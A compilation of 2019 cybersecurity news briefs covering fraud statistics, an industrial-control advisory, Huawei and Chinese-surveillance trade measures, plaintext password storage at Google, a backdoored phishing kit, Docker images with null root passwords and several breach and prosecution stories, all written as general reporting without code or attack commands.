Fraud attacks from mobile apps spiked by 300% in the first quarter of 2019, according to new researcher from RSA.

Published today, the Fraud Attack Trends: Q1 2019 report found that the total fraud attacks from rogue mobile applications on January 1 was 10,390 but had jumped to 41,313 by March 31.

Rogue mobile apps are those designed to duplicate legitimate apps of trusted brands, which are a fast-growing phenomenon among cyber-criminals and a huge digital risk for consumers and businesses, according to the report.

In addition, the report found that fraud attacks introducing financial malware increased 56%, from 6,603 in Q4 2018 to 10,331 in Q1 2019. Of all the fraud attacks RSA observed in the first quarter, phishing accounted for 29%, though the overall phishing volume grew less than 1% quarter over quarter. Additionally, phishing decreased rather significantly in terms of overall fraud attacks, which the report said was due to the exponential growth of attacks from rogue mobile apps.

An increasing threat for e-commerce business is fraud attacks on card-not-present (CNP) transactions, which grew by 17% in the first quarter of 2019. Of those attacks, 56% originated from mobile. 

“Canada, Spain and the Netherlands remain the top three countries targeted by phishing, representing 78% of total attack volume. The Philippines appeared on the list, replacing Brazil as a top target with 2% of total phishing volume in Q1,” the report said.

Of all the countries observed, Spain was targeted with a high volume of phishing, which the report attributed to the launch of new innovative digital payment services among many prominent financial institutions, which serves as a reminder that cyber-criminals are looking to exploit digital transformation initiatives.

“The old username/password combination is simply no longer sufficient as a form of consumer authentication. The use of multi-factor, adaptive authentication and transaction risk analysis to watch for signs of fraud based on device, user behavior and other indicators is another critical layer to prevent the onslaught of account takeover in the event of a successful login attempt,” the report said.

Firmware Vulnerability in Mitsubishi Electric

Firmware Vulnerability in Mitsubishi Electric

A vulnerability in Mitsubishi Electric’s MELSEC-Q Series Ethernet Module could allow a remote attacker to gain escalated privileges, according to an ICS-CERT advisory.

Reported by Nozomi Networks, the vulnerability “could allow an attacker to render the PLCs statue in fault mode, requiring a cold restart for recovering the system and/or doing privilege escalation or executive arbitrary code in the context of the affected system of the workstation engineering software,” said Nozomi Networks co-founder and CTO Moreno Carullo.

On May 21, the US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) issued an ICS-CERT Advisory (ICSA-19-141-0s), noting that the vulnerability in uncontrolled resource consumption was exploitable remotely and required a low skill level to exploit. 

“Organizations that may be potentially impacted can implement the following National Cybersecurity and Communications Integration Center (NCCIC) mitigations: Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the internet,” Carullo said.

“Locate control system networks and remote devices behind firewalls, and isolate them from the business network. When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may also have vulnerabilities and should be updated to the most current versions available. Also recognize that VPN is only as secure as the connected devices.”

Mitsubishi Electric has issued a firmware patch and recommends operating the affected device behind a firewall.

NCCIC encourages users to take defensive measures to minimize the risk of exploitation of this vulnerability, noting that users should:

  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from the business network.
  • Use secure methods when remote access is required, such as VPNs, recognizing that VPNs may have vulnerabilities and should be updated to the most current version available and that a VPN is only as secure as the connected devices.

US May Ban Chinese Surveillance Camera Companies

US May Ban Chinese Surveillance Camera Companies

Citing human rights as the primary concern, the US announced that it is considering a ban on surveillance technologies produced by five Chinese companies, including Hangzhou Hikvision Digital Technology Co. and Zhejiang Dahua Technology Co., to a blacklist that bars them from US components or software, according to The New York Times and Bloomberg.

Hikvision’s cameras are used the world over, which has raised human rights concerns given the recent revelation that nearly 1.2 million Muslims are being detained in camps in Xinjiang, where Hikvision won five contracts worth billions of yuan last year, according to Forbes.

“We hope the company receives a fair and just treatment,” Hikvision’s secretary of the board, Huang Fanghong, reportedly said in a statement. Dahua representatives had no immediate comment, according to Bloomberg.

Evidence supports the claims that Hikvision is involved in the surveillance efforts conducted in Xinjiang, despite the company asserting that it is nothing more than a product provider.

“Hikvision's own website directly contradicts this claim,” wrote Charles Rollet for IPVM. “In 2017, Hikvision proudly posted that it had won a $79 million safe city project in Xinjiang's capital of Urumqi, stating the project included about 30,000 cameras and data centers.

“Bidding documents also show Hikvision itself directly bid and won wide-ranging surveillance projects in Xinjiang. For a $46m project in Xinjiang's Karakax (or Moyu) county, Hikvision is listed as the sole winner in Chinese bidding documents, which even include its headquarters' address in Hangzhou and state the project is 'BOT,' a scheme in which companies Build, Operate, and then Transfer projects to authorities. Hikvision is also listed as the only winner in bidding documents for a different $53 million surveillance project in Pishan County, which also list its Hangzhou address.”

In addition, Hikvision, Dahua and other companies have reportedly “benefited handsomely from Chinese President Xi Jinping’s unprecedented push to keep tabs on the country’s 1.4 billion people,” according to Bloomberg.

In 2016 IHS Markit reported that China had approximated 176 million video surveillance cameras in use through its public streets, buildings and public spaces, more than three times the 50 million used in America, Bloomberg reported.

Google Stored Plaintext Passwords Since 2005

Google Stored Plaintext Passwords Since 2005

Google has admitted that some of its enterprise customers’ passwords have been erroneously stored in plaintext, in a security issue dating back 14 years.

The tech giant’s VP of engineering, Suzanne Frey, explained that the problem occurred when it introduced a new way for G Suite domain administrators to upload and manually set new passwords for their employees, to help with onboarding and account recovery.

“We made an error when implementing this functionality back in 2005: The admin console stored a copy of the unhashed password. This practice did not live up to our standards,” she added.

“To be clear, these passwords remained in our secure encrypted infrastructure. This issue has been fixed and we have seen no evidence of improper access to or misuse of the affected passwords.”

It’s unclear exactly how many users have been affected by this security snafu: Google would only say that it relates to a “subset of G Suite” customers. No consumer Google accounts were impacted.

Frey’s team also spotted a separate but similar security issue, dating back to the start of this year.

“As we were troubleshooting new G Suite customer sign-up flows, we discovered that starting in January 2019 we had inadvertently stored a subset of unhashed passwords in our secure encrypted infrastructure,” she explained.

“These passwords were stored for a maximum of 14 days. This issue has been fixed and, again, we have seen no evidence of improper access to or misuse of the affected passwords. We will continue with our security audits to ensure this is an isolated incident.”

All G Suite admins impacted by these issues have been notified, and Google said it will reset passwords on any affected account where action is not taken.

Facebook, Twitter and GitHub have all admitted storing user passwords in plaintext over the past year or so. In Facebook's case, hundreds of millions of users are thought to have been affected.

FCA: £27m Lost to Crypto Scams Last Year

FCA: £27m Lost to Crypto Scams Last Year

The UK’s financial regulator has warned that £27m was lost in the last financial year to scams promising big returns on cryptocurrency and foreign exchange (forex) investments.

The Financial Conduct Authority (FCA) claimed that investors lost on average £14,600 to fraud during the 12-month period, with reports of scams more than tripling to 1800.

This kind of fraud typically starts on social media, where investors are lured by “get rich quick” promises, images of luxury items and celebrity endorsements. Clicking through takes them to legitimate-looking websites where they are tricked into handing over money.

“Investors will often be led to believe that their first investment has successfully made a profit,” warned the FCA.

“The fraudster will then contact the victim to invest more money or introduce friends and family with the false promise of greater profits. However, eventually the returns stop, the customer account is closed and the scammer disappears with no further contact.”

The findings are part of an awareness campaign being run by the FCA, supported by Action Fraud and the City of London police.

Its ScamSmart website is designed to make consumers more skeptical of get rich quick cryptocurrency and forex schemes.

“We’re warning the public to be suspicious of adverts which promise high returns from online trading platforms,” said Mark Steward, executive director of enforcement and market oversight at the FCA.

“Scammers can be very convincing so always do your own research into any firm you are considering investing with, to make sure that they are the real deal. Before investing online find out how to protect yourself from scams by visiting the ScamSmart website, and if in any doubt — don’t invest.”

Anyone that has fallen victim is urged to contact Action Fraud.

A report by Ernst & Young last year revealed that 10% of cryptocurrency ICOs lose their funds to hackers, with phishing a popular way to trick investors into handing over the private keys to their digital wallets.

Lib Dems Come First in UK for Cybersecurity

Lib Dems Come First in UK for Cybersecurity

Sweden’s political parties have the best cybersecurity posture globally, with the UK languishing in the bottom half of the table, according to a new analysis by SecurityScorecard ahead of the European Parliament elections.

Noting the impact of a major data breach at the Democratic National Committee (DNC) which helped to swing the 2016 Presidential election in favor of Donald Trump, the security vendor decided to appraise the security of political parties in the West.

It covered nine countries — the US, France, Germany, Spain, UK, Poland, Italy, Switzerland and Sweden — and two UK nations which have separate domestic parliaments, Northern Ireland and Scotland.

Some 29 political parties were selected for analysis, which covered areas including web app identification, network security and DNS configuration, malware infections, leaked credentials, patching, and more.

“SecurityScorecard found the two major US political parties, Republican National Committee (RNC) and Democratic National Committee (DNC), fared well compared to smaller US political parties and European political parties as a whole,” the report claimed.

“With that said, SecurityScorecard discovered indicators of poor security hygiene in almost all political parties.”

Sweden came top of the 11-country list, with the US in fifth and the UK down in eighth, just three notches above bottom-placed France.

In the UK, the centrist Liberal Democrats were named as the best on cybersecurity, coming top on DNS, network security and patching cadences, although its application security score fared less well.

The Conservative Party was called out for hosting an unencrypted log-in portal for its PureCampaign application.

“Although the credentials are sent to the server via a secure manner, this represents poor security design and presents a risk to a simple MitM or social engineering attack,” the report argued.

In the US, the DNC still appears not to have learned its lesson from 2016.

“While SecurityScorecard believes the DNC has made significant investments in security since 2016, the organizational behavior at managing digital assets still lags behind the RNC,” the report noted.

DHS Issues Alert on Chinese-Made Drones

DHS Issues Alert on Chinese-Made Drones

Chinese-made drones may be sending sensitive flight data to their manufacturers in China, according an alert issued by the US Department of Homeland Security (DHS), CNN reported on May 20.

In a copy of the alert obtained by CNN, DHS said, "The United States government has strong concerns about any technology product that takes American data into the territory of an authoritarian state that permits its intelligence services to have unfettered access to that data or otherwise abuses that access.”

While the report refrains from naming specific manufacturers, approximately 80% of the drones used in the US and Canada reportedly come from DJI in Shenzhen, China. DHS reportedly is concerned about "potential risk to an organization's information…[from products that] contain components that can compromise your data and share your information on a server accessed beyond the company itself," according to CNN.

"Those concerns apply with equal force to certain Chinese-made (unmanned aircraft systems)-connected devices capable of collecting and transferring potentially revealing data about their operations and the individuals and entities operating them, as China imposes unusually stringent obligations on its citizens to support national intelligence activities," the alert reportedly added.

“The Department of Commerce required Google to pull rights to use Google Play and apps on Android from Huawei. Now, we are hearing about risks of Chinese-made drones, which the primary manufacturer is DJI based in China,” said Chris Morales, head of security analytics at Vectra.

“The overall theme is that a third-party manufacturer could be using personal data for malicious intent. This is a theme that should expand beyond just a specific nation state actor. This is a real concern for any device that is collecting data on a user, regardless of where they are based.

“It doesn’t mean everyone is bad, though. Most organizations are in the business of making money and are not intentionally causing harm to consumers. Personally, I don’t even like enabling features, such as location services, on my personal device that gives even American companies too much data about me and my own personal habits.”

Ransomware Not Gone but More Targeted, Report Says

Ransomware Not Gone but More Targeted, Report Says

Cyber-criminals continue to grow more sophisticated, developing advanced attack methods, including tailored ransomware, according to the Q1 Global Threat Landscape Report, published today by Fortinet. In addition to targeted attacks, criminals are also using custom coding, living-off-the-land (LotL) and sharing infrastructure to maximize their opportunities, the report said.

Despite a decline in previous high rates of ransomware, ransomware itself is far from gone. Instead, cyber-criminals are using more targeted attacks. Ransomware “is being customized for high-value targets and to give the attacker privileged access to the network. LockerGoga is an example of a targeted ransomware conducted in a multi-stage attack. There is little about LockerGoga that sets it apart from other ransomware in terms of functional sophistication, but while most ransomware tools use some level of obfuscation to avoid detection, there was little of it used when analyzed,” the report said.

Researchers also detected an uptick in malicious actors leveraging dual-use tools, preinstalled on targeted systems to carry out cyber-attacks. 

The report noted the trend of shared infrastructure. Researchers detected a rise in the total malware and botnet communication activity, as well as the number of domains shared between threats at each stage of the kill chain.

“Nearly 60% of threats shared at least one domain indicating the majority of botnets leverage established infrastructure. IcedID is an example of this 'why buy or build when you can borrow' behavior. In addition, when threats share infrastructure they tend to do so within the same stage in the kill chain. It is unusual for a threat to leverage a domain for exploitation and then later leverage it for C2 traffic. This suggests infrastructure plays a particular role or function when used for malicious campaigns,” the report said.

“We, unfortunately, continue to see the cyber-criminal community mirror the strategies and methodologies of nation-state actors, and the evolving devices and networks they are targeting,” said Phil Quade, chief information security officer, Fortinet, in a press release.

“Organizations need to rethink their strategy to better future-proof and manage cyber risks. An important first step involves treating cybersecurity more like a science – doing the fundamentals really well – which requires leveraging the cyberspace fundamentals of speed and connectivity for defense. Embracing a fabric approach to security, micro and macro segmentation and leveraging machine learning and automation as the building blocks of AI can provide tremendous opportunity to force our adversaries back to square one.”

Encryption is Often Poorly Deployed, if Deployed at All

Encryption is Often Poorly Deployed, if Deployed at All

Encryption continues to be a challenge for companies, as only a quarter of organizations admit to using it for at-rest data, and for emails and data centers.

According to research by Thales and IDC, encryption for email is only adopted by around 27% of European of the respondents they recently surveyed, while the numbers decline for data at rest, data centers, Big Data environments and full disk encryption. The only instance of European respondents ranking higher than a global number was in the instance of using cloud-native provider encryption.

Speaking at an event in London, Thales senior regional sales director, Kai Zobel, said that despite the introduction of GDPR a year ago “companies struggle to understand where the data is” and he has seen some companies buy a product to “encrypt some islands but then they struggle to continue. So we see thousands of potential servers that need to be encrypted but they [some companies] just do 200 and they think they are done.”

Zobel added that with more and more politics in the workplace, data “doesn’t want to be touched” and there is a feeling that security cannot be relied upon.

“They [organizations] have long lists of what to implement in the next 12 months, but they struggle to implement it and one of the main reasons is because of complexity,” Zobel said. “This is because they don’t have enough people to understand the technology in the best way possible.”

He also commented that a number of companies look for “good enough compliance” and people would rather spend less than ensure 100% security, “so they are just trying to find good solutions but not 'The Best' solution.”

Jason Hart, security evangelist at Thales, said that there is a wider problem of nothing changing in the last 25 years, except that we are creating more and more data. That has become a commodity, and “because of the acceleration of cloud I say to a company ‘what are you trying to protect?’ and after an hour we may get to a conversation about data and two hours later we may get to the type of data that they deem to be valuable.”

However, Hart argued that companies do not understand the risks that they are trying to mitigate, “and information security is really simple, it is about people, data and process.”

Speaking to Infosecurity, Hart said that if you look at every major breach that has occurred, there are too many instances of companies not deploying encryption properly, and also people do not look at the risk.

“You encrypted the data in the database, but what talks to the database? The application, so the data now transverses into the application’s code text and then from the application it goes into the cloud,” he said. “So they do it in silos and elements, but when people do it wrong, there is a false sense of security.” 

DDoS Attacks on the Rise After Long Period of Decline

DDoS Attacks on the Rise After Long Period of Decline

The number of DDoS attacks increased by 84% in the first quarter of 2019 compared to Q4 2018, according to new research from Kaspersky Lab.

The global cybersecurity company’s findings, detailed in its DDoS Attacks in Q1 2019 report, come in the wake of dramatically falling numbers of DDoS attacks recorded throughout 2018, suggesting that cyber-criminals are once again turning to DDoS as an attack method after a sustained period of shifting their attention to other sources of income last year, such as cryptomining.

What’s more, Kaspersky Lab discovered a substantial growth in the amount of attacks that lasted more than an hour. The company suggested that the launch of newer DDoS-for-Hire services could explain the sudden rise in the number of DDoS attacks in 2019.

“The DDoS attack market is changing,” said Alexey Kiselev, business development manager on the Kaspersky DDoS Protection team. “New DDoS services appear to have replaced ones shut down by law enforcement agencies. As organizations implement basic countermeasures, attackers target them with long-lasting attacks. It is difficult to say if the number of attacks will continue to grow, but their complexity is showing no signs of slowing down.

“We recommend that organizations prepare themselves effectively, in order to withstand sophisticated DDoS attacks.”

Kaspersky Labs’ advice for DDoS attack defense included:

•           Ensuring that web and IT resources can handle high traffic

•           Using professional solutions to protect the organization against attacks

Washington Issues Temporary License to Huawei

Washington Issues Temporary License to Huawei

The US government has issued a temporary license to Huawei and its affiliates, allowing American companies to supply the telecoms and handset giant until August.

Despite reports emerging over the weekend of various chipmakers halting supplies to the Chinese firm after it was placed on an Entity List last week, the Commerce Department appears to have softened its stance.

Issued on Monday, the temporary general license for Huawei and 68 non-US affiliates will run for 90 days, bringing it up to August 19 2019.

It covers various areas, including: supplies to ensure Huawei’s networks and equipment are fully operational; software updates for existing Huawei handsets; and disclosure of any security vulnerabilities to the firm.

The license also authorizes US firms to engage with Huawei and its affiliates “as necessary for the development of 5G standards as part of a duly recognized international standards body.”

At the same time, Huawei founder Ren Zhengfei has struck a defiant tone in state media reports, claiming the US “underestimates” the firm’s capabilities and that it has already made efforts to mitigate the impact of any supply chain restrictions.

He has also reportedly claimed that no company can catch Huawei in terms of its 5G technology, a fact that Western lawmakers are grappling with in weighing up how to treat the company.

Lock the company out of 5G completely and it could add years to implementation, impacting customers — or at least, that’s Huawei's argument.

Although UK Prime Minister Theresa May agreed only to allow Huawei to supply non-core parts of carriers’ 5G networks, the decision by the leading Five Eyes nation remains controversial.

A new report by right-wing think tank the Henry Jackson Society co-authored by a Conservative MP and a former government security advisor claims there is “significant risk” in allowing Huawei to supply the UK’s 5G networks.

The report includes a foreword from former MI6 boss, Richard Dearlove, calling on the government to reconsider its position.

Aussie Government IT Worker Arrested for Cryptomining

Aussie Government IT Worker Arrested for Cryptomining

An Australian government IT contractor has been arrested on suspicion of making thousands from an illegal cryptocurrency mining operation at work.

The 33-year-old New South Wales man appeared in court today after allegedly earning AU$9000 ($6188) by “modifying his agency’s computer systems,” according to the Australian Federal Police (AFP).

At Sydney Local Court, he was charged with unauthorized modification of data to cause impairment, and unauthorized modification of restricted data, contrary to the Criminal Code Act 1995.

The charges carry a maximum penalty of 10 years and two years behind bars, respectively.

“Australian taxpayers put their trust in public officials to perform vital roles for our community with the utmost integrity,” argued acting commander, Chris Goldsmid, AFP manager cybercrime operations. “Any alleged criminal conduct which betrays this trust for personal gain will be investigated and prosecuted.”

It’s unclear how the man was eventually caught, but his home was raided by the AFP in March and personal laptop, phone employee ID cards and data files were seized.

Cryptocurrency mining continues to be a threat to businesses, while consumer detections have fallen to almost zero, according to a Malwarebytes report released in April. It said the latter trend had been influenced by Coinhive’s decision to shut down earlier this year.

Although most cryptomining in businesses occurs covertly, directed by external botnet herders in charge of compromised machines, there is always the risk of an insider threat.

A Chinese headmaster was fired last year after secretly mining cryptocurrency using his school’s electricity supply. Hunan man Lei Hua hooked up eight mining machines to the mains, running up an electricity bill of 14,700 yuan ($2125) mining Ethereum 24 hours a day.

Phishing Kit 16Shop Targets Apple Users, Hackers

Phishing Kit 16Shop Targets Apple Users, Hackers

Researchers have discovered a hidden backdoor in a commercial phishing kit, 16Shop, used to attack Apple customers, according to Akamai.

“When it comes to targeting Apple users and their personal and financial data, 16Shop has emerged as a go to kit for those who can afford it. While 16Shop is sold to criminals looking to collect sensitive information from a targeted subset of the Internet community, at least one pirated version circulating online houses a backdoor that siphons off the data harvested and delivers it to a Telegram channel – proving once more that there is no honor among thieves," wrote Akamai researcher Amiram Cohen.

According to the research, this highly sophisticated and neatly constructed kit has layered defenses, as well as attack mechanisms. “It's a true multi-level kit, running different stages for different brands, depending on the information the victim provides. It has the ability to change its layout and presentation depending on platform, so mobile users will see a website tailored to their device, while desktop users see something better suited to their situation,” wrote Cohen.

Credit: Akamai
Credit: Akamai

The phishing kit was allegedly developed by an Indonesian whom Cohen said “has the skill to be a legitimate security community member, as well as the skills to maintain a healthy career in development. Instead, and most unfortunately, their knowledge is applied to a criminal enterprise.”

Until now, the individual has been known only as either devilscream or Riswanda. In addition to Cohen multiple online researchers “have located various personal artifacts of Riswanda's, including GitHub repositories, security presentations, past examples of website defacements, pictures of family and friends, email address, and social media accounts.”

However, some users of the phishing kit have been sharing their criminally obtained information without their knowledge through a backdoor that makes a copy of the victim's information and secrets it over to a bot waiting in a room on Telegram, according to Cohen.

“Akamai first discovered this backdoor while examining code inside of main.php, which was obfuscated in a way that made it stand out. The highly obfuscated code collects information for all of the forms visited by the victim, and no matter what storage and delivery options are selected by the 16Shop operator, the victim's data is siphoned off and sent to the Telegram bot via API calls,” Cohen said.

The author reportedly has released video demonstrations showing active usage of Telegram as a means of data storage. “However, like other popular phishing kits, 16Shop has been pirated. Based on comparisons against multiple versions of the 16Shop, the backdoor only appears in the de-obfuscated version of the kit,” Cohen said.

Fifth of Docker Containers Have No Root Passwords

Fifth of Docker Containers Have No Root Passwords

A fifth of the world’s most popular Docker containers contain a security issue which could make them vulnerable to attack in some circumstances, a researcher has discovered.

Kenna Security principal security engineer, Jerry Gamblin, explained that after recent Cisco Talos research revealed Alpine Linux docker images were shipping with no (nulled) root passwords, he decided to dig a little deeper.

Running a script on the 1000 most popular containers in the Docker store, he found 194 (19.4%) also had nulled root passwords.

“The findings are interesting, but I don’t want to be overly alarmist. Just because a container has no root password does not mean that it is automatically vulnerable,” he explained.

“These findings could lead to configuration-based vulnerabilities in certain situations, as was the case with this the Alpine Linux vulnerability.”

Specifically, only containers which use Linux pluggable authentication modules (PAM) or “some other mechanism which uses the system shadow file as an authentication database” are vulnerable to exploitation, as Cisco detailed.

The most popular container on the list affected by the issue was kylemanna/openvpn: a software unit that has been used over 10 million times, according to Gamblin.

Other names on the list included govuk/governmentpaas, hashicorp, microsoft, monsanto and mesosphere.

In the Alpine Linux case, exposed containers could find they are at risk of Docker image vulnerability (CVE-2019-5021), whereby an attacker can elevate their privileges to root within the container.

“Deploying containers that allow users to authenticate as root should be avoided at all costs, because authenticating as root is already outside the scope of ‘best practices’ for secure containers or generally in system,” argued Gamblin.

KnowBe4 Announces Acquisition of CLTRe

KnowBe4 Announces Acquisition of CLTRe

KnowBe4 has announced the acquisition of CLTRe, adding the capability to measure security culture into its portfolio.

Led by Kai Roer, CLTRe is a Norwegian company focused on helping organizations assess, build, maintain and measure a strong security posture. It will continue to operate as an independent subsidiary of KnowBe4.

The acquisition will mean that CLTRe’s toolkit and Security Culture Framework will be available to all KnowBe4 customers later this year.

Stu Sjouwerman, CEO of KnowBe4, said: “Today’s announcement brings KnowBe4 very valuable tools to help our customers measure what matters – their security culture – so they can make decisions about how to improve. We’re excited to welcome Kai and the CLTRe team to the KnowBe4 family and to enhance our European presence while supporting more global customers.”

Roer said that KnowBe4 “is a natural fit for our evidence-based analytics and measurement tools, as KnowBe4 customers will now be able to measure their security cultures, benchmark against their industry sectors, and pinpoint exactly what kind of security culture they have.”

He said: “With KnowBe4 and CLTRe, organizations can gain true insight into their security culture, improve their security with pinpoint accuracy, report their progress to their board of directors and educate their users to make smarter security decisions.”

CLTRe measures the seven dimensions of security culture: behavior, responsibilities, cognition, norms, compliance, communication and attitudes.  

Listen to Kai Roer, along with Espen Otterstadt and Nicola Whiting, as Security Culture was discussed as part of the Infosecurity Magazine Online Summit

Ecuador Shares Assange’s Legal Docs with US

Ecuador Shares Assange's Legal Docs with US

Complying with a request by US authorities, Ecuadorian officials are preparing to hand over documents that are reportedly the entire legal defense against Julian Assange, compiled during the time he has been living in the Ecuadorian embassy in London, according to WikiLeaks.

"On Monday Ecuador will perform a puppet show at the embassy of Ecuador in London for their masters in Washington, just in time to expand their extradition case before the UK deadline on 14 June," WikiLeaks editor-in-chief Kristinn Hrafnsson said. "The Trump administration is inducing its allies to behave like it's the Wild West."

Assange’s lawyers are reportedly not permitted to be present during what is being called the “illegal seizure of his property.”

“The material includes two of his manuscripts, as well as his legal papers, medical records and electronic equipment. The seizure of his belongings violates laws that protect medical and legal confidentiality and press protections,” WikiLeaks said.

Ecuador officials also refused a request by UN special rapporteur on privacy, who requested permission to monitor Ecuador's seizure of Assange's property.

The US had previously asked Ecuador to share audiovisual material and additional documents, which had reportedly been collected during an internal spying operation against Assange, WikiLeaks said.

"It is extremely worrying that Ecuador has proceeded with the search and seizure of property, documents, information and other material belonging to the defense of Julian Assange, which Ecuador arbitrarily confiscated, so that these can be handed over to the agent of political persecution against him, the United States. It is an unprecedented attack on the rights of the defence, freedom of expression and access to information exposing massive human rights abuses and corruption. We call on international protection institutions to intervene to put a stop to this persecution," said Baltasar Garzón, international legal coordinator for the defense of Assange and WikiLeaks.

Though Ecuador is obviously not a part of the EU, "if arguing that because Assange is an EU resident and therefore subject to the protections of GDPR, Article 23 makes a pretty strong case that those protections become restricted if revealing that data was a matter of national defense or if some other form of legal matter, either criminal or civil, is involved,” said Nathan Wenzler, senior director of cybersecurity at Moss Adams.

“While I’m not a lawyer, it seems likely that all nations involved would have a good chance of demonstrating some sort of legal action involved here and thus, make this action a non-event under the provisions of GDPR. Morally, there’s a whole other argument here that could (and should, in my opinion) be had. However, I’m not sure there’s much that can or will be done under GDPR in this case.”

New South Wales Announces New Cybersecurity Position

New South Wales Announces New Cybersecurity Position

In an attempt to centralize all of the cyber efforts and strategies of the state, New South Whales (NSW) has announced a new cybersecurity NSW office to be led by led by Tony Chapman, chief cybersecurity officer, according to a May 20 press release.

Chapman assumed the position today, which falls under the department of customer service, and wrote via LinkedIn, “The changes reflect the leadership and coordination role required to uplift cyber security and decision-making across NSW Government.

I am performing the functions previously undertaken by the NSW Government Chief Information Security Officer (GCISO), established in March 2017, with a renewed focus on securing digital transformation and the continual improvement of customer service outcomes.”

To enable digital transformation, a part of the overall vision of the new customer service cluster, the office will focus on improving cybersecurity capabilities and standards to include a coordinated cyber-incident response plan and develop strategic cyber-policy positions through a revitalized cybersecurity senior officers’ group (CSSOG), according to Chapman.

To see the vision of the new customer service cluster to its fruition, Chapman said he will work to strengthen ties across NSW's government, other states' governments and the federal government to establish cybersecurity best practices that will yield better results for citizens.

“A key component of the role will be driving a culture of risk management and awareness to support greater resilience to cyber security threats. Tony and his team will build on the digital transformation work occurring across the NSW government, ensuring our digital spaces are safeguarded against cyber threats,” said the state government's chief information and digital officer, Greg Wells, in the press release.

“Cybersecurity NSW will continue its critical work enhancing whole-of-government cyber security capabilities and standards on behalf of NSW. It will also work more closely with the information and privacy commission on security, privacy and the availability of systems and services during the State’s digital transformation.”

Online Account Hijacker Forum OGUsers Hacked

Online Account Hijacker Forum OGUsers Hacked

An online forum used by those involved in online account hijacking has been breached, according to KrebsonSecurity.

An attack on leaked the personal information of nearly 113,000 people. Krebs reportedly received a copy of the database, which included usernames, email addresses, hashed passwords, private messages and IP address.

The RaidForums Omnipotent administrator announced to forum members that he had made the OGUsers forum database for available for download, writing:

Hello RaidForums Community,

Today I have uploaded the OGUsers Forum Database for you to download for free, thanks for reading and enjoy!

On the 12th of May 2019 the forum was breached 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I'm the first to tell you the truth view his statement here or if you don't want to visit their website view it here. According to his statement he didn't have any recent backups so I guess I will provide one on this thread lmfao.

Compromised data: Website activity, Usernames, Emails, IP Addresses, Passwords (Salted MD5), Source code, Website data, User private messages.

While users on the forum expressed concern about their identities being revealed as a result of the hack, Krebs said, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”

LeakedSource Company Pleads Guilty

LeakedSource Company Pleads Guilty

The operators of an infamous breached credentials site have pleaded guilty to trading in stolen information, according to Canadian police.

Defiant Tech, which owns the LeakedSource website, entered the plea on Friday at a court in Ottowa, a brief notice from the Royal Canadian Mounted Police (RCMP) stated.

The charges of “trafficking in identity information and possession of property obtained by crime” came after an investigation was launched by the police in 2016, when the RCMP found that servers hosting LeakedSource were located in Quebec.

Project “Adoration,” as it was known, saw the RCMP’s newly formed National Division Cybercrime Investigative Team receive assistance from the Dutch National Police and the FBI.

In December 2017, Jordan Evan Bloom, 27, from Thornhill, Ontario, was arrested on suspicion of making an estimated C$247,000 ($200,000) from the business.

The now-defunct site had a database of around three billion passwords and identity records, which users could access via simple search functionality for a fee. This information is said to have been purchased from hackers and lifted from the public domain. Data was taken from big-name companies like LinkedIn and MySpace.

"We are pleased with this latest development,” said superintendent Mike Maclean, officer in charge of criminal operations for RCMP National Division.

“This is all thanks to the relentless efforts put by our men and women working in the National Division Cybercrime Investigative Team. I am immensely proud of this outcome as combating cybercrime is an operational priority for us."

A second man is suspected to have conspired with Bloom, but charges have so far not been brought.

Ex-CIA Man Gets 20 Years for Handing China Secrets

Ex-CIA Man Gets 20 Years for Handing China Secrets

A former CIA intelligence officer has been sentenced to two decades behind bars after being found guilty last year of passing defense secrets to China.

Kevin Patrick Mallory, 62, of Leesburg, was found guilty by a federal jury in June 2018 of conspiracy to deliver, attempted delivery, delivery of national defense information to aid a foreign government, and making material false statements.

He is said to have been paid $25,000 for handing classified documents to 'Michael Yang,' a Chinese intelligence officer he met in Shanghai in March and April 2017.

These documents included information on CIA informants, according to the Department of Justice.

Fluent Mandarin-speaker Mallory is said to have scanned the Top Secret documents onto an SD card at his local FedEx store. Yet although he shredded the originals, the FBI found the storage device carefully hidden, during a search of his home.

The disgraced former spy worked for various government agencies and defense contractors, including roles as a covert case officer for the CIA and an intelligence officer for the Defense Intelligence Agency (DIA). His Top Secret clearance is said to have been terminated in 2012 when he left government service.

“Former US intelligence officer Kevin Patrick Mallory will spend the next 20 years of his life in prison for conspiring to pass national defense information to a Chinese intelligence officer,” said assistant attorney general for national security, John Demers.

“This case is one in an alarming trend of former US intelligence officers being targeted by China and betraying their country and colleagues. This sentence, together with the recent guilty pleas of Ron Hansen in Utah and Jerry Lee in Virginia, deliver the stern message that our former intelligence officers have no business partnering with the Chinese, or any other adversarial foreign intelligence service.”

Lee is thought to have provided the information needed to take down a major CIA network in China between 2010 and 2012. The US is believed to be at a distinct intelligence disadvantage now with regards to China.

Chipmakers Cut Huawei Shipments

Chipmakers Cut Huawei Shipments

European and US chipmakers have stopped supplying Huawei with products while Google will cease providing technical Android support from the next OS iteration, as Donald Trump’s executive order starts to bite.

Google said in a tweet yesterday: “while we are complying with all US gov't requirements, services like Google Play & security from Google Play Protect will keep functioning on your existing Huawei device.”

However, it’s believed the same will not be true of new Huawei handsets. Google is also set to cut key support for the operating system from its next version, which could leave users without apps like YouTube and Google Maps, according to reports.

Huawei could still use the open source version of Android, although it has been developing an in-house OS which it could also switch across to in the event that Trump’s executive order is not reversed.

The firm is also being hit as global chipmakers cut supplies in compliance with the order. Qualcomm (smartphones) Intel (servers and laptops), Xilinx and Broadcom (networking kit) and many other US producers, as well as German chipmaker Infineon, have reportedly taken immediate action.

Huawei produces some processors and modems for its smartphones in-house, so Qualcomm’s decision is perhaps the least likely to affect it. The firm is said to have stockpiled other types of chips for several months while it waits to see whether the US action is a bargaining play or is set for the long-term.

Trump signed an executive order last week banning “foreign adversaries” from providing telecoms equipment in the US. However, Huawei and 70 subsidiaries were also placed on an “Entity List” meaning US firms are not able to supply it with their products unless Huawei is granted a special license from the Commerce Department.

Although the tech firms have already taken action, the department is still drawing up the enforcement plan, and has 150 days to do so.

